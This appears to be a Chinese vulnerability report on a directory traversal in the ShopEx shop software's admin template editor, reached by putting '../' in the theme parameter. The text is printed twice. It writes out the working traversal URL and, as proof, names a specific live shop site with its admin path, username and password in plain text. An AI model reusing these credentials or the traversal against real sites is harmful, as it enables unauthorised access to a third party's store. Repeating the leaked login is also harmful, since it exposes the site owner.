### 简要描述: ShopEx后台历遍目录 很蛋疼的 记得10年的是也有过的差不多的漏洞 ### 详细说明: 主要是出在模板上 我们编辑目录之后得到URL http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme= 这里theme= 可以做../跳转 http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../ 跳到了上级目录 ### 漏洞证明: 给个实例证明 http://mocosn.com/ 后台:shopadmin 用户:mocosnnet 密码:kingsvm- [<img src="https://images.seebug.org/upload/201207/23232118fede5f079b2a99ae4fc2752a970c9433.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/23232118fede5f079b2a99ae4fc2752a970c9433.jpg) [<img src="https://images.seebug.org/upload/201207/23232125449af361d98b31382eeb25ec048f5f0a.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/23232125449af361d98b31382eeb25ec048f5f0a.jpg) [<img src="https://images.seebug.org/upload/201207/2323213259e49051e8f948664f7698f6664281ca.jpg" alt="" width="600"...
### 简要描述: ShopEx后台历遍目录 很蛋疼的 记得10年的是也有过的差不多的漏洞 ### 详细说明: 主要是出在模板上 我们编辑目录之后得到URL http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme= 这里theme= 可以做../跳转 http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../ 跳到了上级目录 ### 漏洞证明: 给个实例证明 http://mocosn.com/ 后台:shopadmin 用户:mocosnnet 密码:kingsvm- [<img src="https://images.seebug.org/upload/201207/23232118fede5f079b2a99ae4fc2752a970c9433.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/23232118fede5f079b2a99ae4fc2752a970c9433.jpg) [<img src="https://images.seebug.org/upload/201207/23232125449af361d98b31382eeb25ec048f5f0a.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/23232125449af361d98b31382eeb25ec048f5f0a.jpg) [<img src="https://images.seebug.org/upload/201207/2323213259e49051e8f948664f7698f6664281ca.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/2323213259e49051e8f948664f7698f6664281ca.jpg)
